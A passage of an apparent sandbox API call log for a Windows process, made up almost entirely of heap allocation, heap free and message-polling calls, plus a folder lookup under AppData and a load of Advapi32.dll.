lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0123.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0123.168] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0123.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0123.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0123.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0123.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0123.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0123.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0123.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.172] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Macromedia", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53cdcf0, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xd35c70fc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe53cf090, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 0x9a4a40 [0123.173] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0123.173] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0123.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.173] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.174] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.174] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.174] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.174] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.174] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.174] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0123.175] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.175] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.175] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.175] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.175] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0123.175] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.175] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0123.176] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0123.176] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0123.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 